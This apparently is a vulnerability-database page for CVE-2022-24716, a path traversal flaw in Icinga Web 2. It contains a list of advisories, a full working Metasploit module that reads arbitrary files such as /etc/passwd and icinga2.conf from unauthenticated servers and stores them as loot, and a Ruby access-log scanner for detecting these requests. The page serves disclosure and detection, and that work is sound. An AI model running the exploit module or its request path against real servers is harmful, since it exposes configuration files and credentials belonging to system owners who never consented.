| Title | Published | Views | Family |
|---|---|---|---|
| Icinga Web 2.10 - Arbitrary File Disclosure Exploit | 8 Apr 2023 00:00 | – | zdt |
| Exploit for Path Traversal in Icinga Icinga_Web_2 | 19 Mar 2023 20:41 | – | githubexploit |
| Exploit for Path Traversal in Icinga Icinga_Web_2 | 26 Mar 2023 01:03 | – | githubexploit |
| Exploit for Path Traversal in Icinga Icinga_Web_2 | 27 Mar 2023 02:22 | – | githubexploit |
| The vulnerability of the PHP framework Icinga Web 2, which allows a hacker to execute arbitrary code. | 12 Apr 2023 00:00 | – | bdu_fstec |
| CVE-2022-24716 | 8 Mar 2022 22:40 | – | circl |
| Icinga Web 2 path traversal vulnerability | 8 Mar 2022 00:00 | – | cnnvd |
| CVE-2022-24716 | 8 Mar 2022 00:00 | – | cve |
| CVE-2022-24716 Path traversal in Icinga Web 2 | 8 Mar 2022 00:00 | – | cvelist |
| CVE-2022-24716 | 8 Mar 2022 00:00 | – | debiancve |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Icingaweb Directory Traversal in Static Library File Requests',
        'Description' => %q{
          Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
          unauthenticated directory traversal vulnerability. The vulnerability is triggered
          through the icinga-php-thirdparty library, which allows unauthenticated users
          to retrieve arbitrary files from the targets filesystem via a GET request to
          /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk> as the user
          running the Icingaweb server, which will typically be the www-data user.

          This can then be used to retrieve sensitive configuration information from the target
          such as the configuration of various services, which may reveal sensitive login
          or configuration information, the /etc/passwd file to get a list of valid usernames
          for password guessing attacks, or other sensitive files which may exist as part of
          additional functionality available on the target server.

          This module was tested against Icingaweb 2.9.5 running on Docker.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Jacob Ebben', # EDB
          'Thomas Chauchefoin' # initial POC and discovery
        ],
        'References' => [
          ['EDB', '51329'],
          ['URL', 'https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/'],
          ['URL', 'https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw'],
          ['URL', 'https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d'],
          ['CVE', '2022-24716'],
        ],
        'Targets' => [
          ['Icingaweb', {}],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        },
        'DisclosureDate' => '2022-05-09',
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the Icinga Application', '/']),
        OptString.new('FILE', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
      ]
    )
  end

  def check_host(_ip)
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path)
    )
    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return Exploit::CheckCode::Unknown("#{peer} - Page didn't load correctly (response code: #{res.code}), check TARGETURI/port?") unless res.code == 200
    return Exploit::CheckCode::Unknown("#{peer} - Page doesn't have a body, check TARGETURI/port?") if res.body.nil?
    return Exploit::CheckCode::Detected("#{peer} - Icinga Web 2 found, unable to determine version.") if res.body.include?('<meta name="application-name" content="Icinga Web 2">')

    return Exploit::CheckCode::Safe("#{peer} - Web server found, but couldn't detect Icinga")
  end

  def run_host(ip)
    vprint_status('Attempting to retrieve file')
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, 'lib', 'icinga', 'icinga-php-thirdparty', datastore['FILE'])
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly. Most likely file doesn't exist (response code: #{res.code})") unless res.code == 200
    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly, no body found") if res.body.nil?
    if !res.body.empty?
      print_good(res.body)
      loot_path = store_loot('icinga file', 'text/plain', ip, res.body, datastore['FILE'])
      print_good("#{datastore['FILE']} saved to #{loot_path}")
    else
      print_error('Response has 0 size.')
    end
  end
end
```
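The module's notes list `IOC_IN_LOGS`: every retrieval leaves a request under `/lib/icinga/icinga-php-thirdparty/` in the web server's access log. The Ruby script below is an added example, not part of the Metasploit module or of Icinga, that flags such requests in a combined-format access log and separates reads answered with HTTP 200 from failed probes. The log format, the `FS_ROOTS` heuristic, the `asset/` path and the sample lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Path prefix named in the module description above.
LIB_PREFIX = '/lib/icinga/icinga-php-thirdparty/'.freeze
# Assumption: top-level filesystem directories that are not asset folders.
FS_ROOTS = %w[etc proc var home root usr opt tmp sys].freeze
# Client address, request target and status from a combined-format log line.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?<target>\S+) [^"]*" (?<status>\d{3}) /

# Returns a finding hash for a suspicious line, or nil for anything else.
def classify(line)
  m = LOG_RE.match(line)
  return nil unless m

  path = m[:target].split('?', 2).first.to_s
  # Decode twice so single- and double-encoded slashes compare in plain form.
  2.times { path = (URI.decode_www_form_component(path) rescue path) }
  idx = path.index(LIB_PREFIX)
  return nil unless idx

  segments = path[(idx + LIB_PREFIX.length)..].split('/').reject(&:empty?)
  return nil unless FS_ROOTS.include?(segments.first) || segments.include?('..')

  # The module treats HTTP 200 as a successful read; anything else is a probe.
  { ip: m[:ip], file: '/' + segments.join('/'),
    verdict: m[:status] == '200' ? :disclosed : :attempt }
end

# Classifies every line and keeps only the findings.
def scan(lines)
  lines.map { |l| classify(l) }.compact
end

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
  '203.0.113.7 - - [10/Apr/2023:10:00:01 +0000] "GET /lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 1423 "-" "-"',
  '203.0.113.7 - - [10/Apr/2023:10:00:02 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty//etc/icinga2/icinga2.conf HTTP/1.1" 404 0 "-" "-"',
  '198.51.100.4 - - [10/Apr/2023:10:05:00 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/%2Fetc%2Fpasswd HTTP/1.1" 200 1423 "-" "-"',
  '192.0.2.10 - - [10/Apr/2023:10:06:00 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/asset/x.js HTTP/1.1" 200 512 "-" "-"',
  '192.0.2.10 - - [10/Apr/2023:10:06:01 +0000] "GET /icingaweb2/css/icinga.min.css HTTP/1.1" 200 9000 "-" "-"'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |f| puts "#{f[:verdict]} #{f[:ip]} #{f[:file]}" }
end
```

A `:disclosed` finding means the server returned content for that path, so the named file should be treated as exposed and any credentials in it rotated.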